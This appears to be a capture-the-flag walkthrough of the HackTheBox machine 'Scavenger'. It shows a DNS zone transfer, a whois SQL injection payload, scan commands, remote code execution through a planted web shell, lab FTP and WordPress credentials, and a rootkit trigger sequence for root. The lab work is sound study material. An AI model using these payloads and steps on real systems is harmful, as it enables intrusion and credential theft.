HackTheBox - Scavenger

Nmap scan results

Enumerating DNS and performing Zone transfer attack

Adding supersechosting.htb to /etc/hosts file.

Zone transfer is the process of copying the contents of the zone file on a primary DNS server to a secondary DNS server. Using zone transfer provides fault tolerance by synchronizing the zone file in a primary DNS server with the zone file in a secondary DNS server.

DNS Zone transfer using dig command in Linux System.

Enumerating Whois (SQL Injection)

Reference: https://book.hacktricks.xyz/pentesting/43-pentesting-whois

We can use whois to lookup the information about a particular domain. With this we can also perform SQL Injection.

We get a SQL Error and thus we can inject some payload to get the data. Common payload is ') or 1=1-- -

This query returned us all the data present in the database. We have the following domains hosted on supersechosting.htb

supersechosting.htb
justanotherblog.htb
pwnhats.htb
rentahacker.htb

Lets add all of these domains to /etc/hosts file. We can also perform zone transfer on this domains using a single script.

for i in $(cat domains.txt);do dig axfr @10.10.10.155 $i > zone_transfer/${i}.txt;done

Exploiting sec03.rentahacker.htb subdomain

So we have a new subdomain for rentahacker.htb and that is sec03.rentahacker.htb

After adding all the domains and subdomains, the hosts file should look like this.

We can start of a gobuster scan in the background for all the websites with extensions as .php,.html and .txt

We get something malicious content on the following domain : http://sec03.rentahacker.htb/

This was the same comment found on the wordpress page and this can lead us to something very interesting.

Fuzzing hidden parameter using ffuf

gobuster dir -u http://sec03.rentahacker.htb/ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php,txt,html -o gobuster-files-scan.out -b 404,403

It looks like the attacker uploaded a malicious shell.php on the server. We can view the file and try to guess the parameter for RCE using wfuzz or ffuf.

ffuf -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://sec03.rentahacker.htb/shell.php?FUZZ=id -fs 0

Remote Code Execution

And we get Remote Code Execution on the target computer. For some reason, we can't get a reverse shell. So let's explore the common files on the Linux system. I happen to find this interesting mail for the user ib01c03. Let's view the contents of it.

FTP Credentials- ib01ftp:YhgRt56_Ta

We can get all the files present on the FTP Server using the following command.

wget -m --no-passive ftp://ib01ftp:YhgRt56_Ta@10.10.10.155 

Incident Response (Checking log files)

Checking the logs, we can say that certain POST requests are made and we can analyze that request in the wireshark.

We get a another set of credentials. pwnhats@pwnhats.htb: GetYouAH4t!.We can also grab the credentials from wp-config.php file.

Using forward-shell script to get shell access

So the outgoing connections are blocked and for that reason we can't get a reverse shell. We will use forward-shell by Ippsec.

A forward shell is a concept of shell interaction with a vulnerable Linux machine based on the named pipes mechanism.

Modify certain parameters and domain name in the script.

Analyzing root.c kernel rootkit using Ghidra

So here to trigger the rootkit, we need to send g0tR0ot to /dev/ttyr0

We can do that as now we have shell access. Let's try that.

We have this root.ko file present in the following directory: /home/ib01c01/...

Let's open this file in ghidra and look at the source code.

So if we send 0x743367 i.e g3t and 0x76317250 i.e Pr1v to /dev/ttyR0, then we can get root access. The concept is same but the source was a bit modified. (g3tPr1v)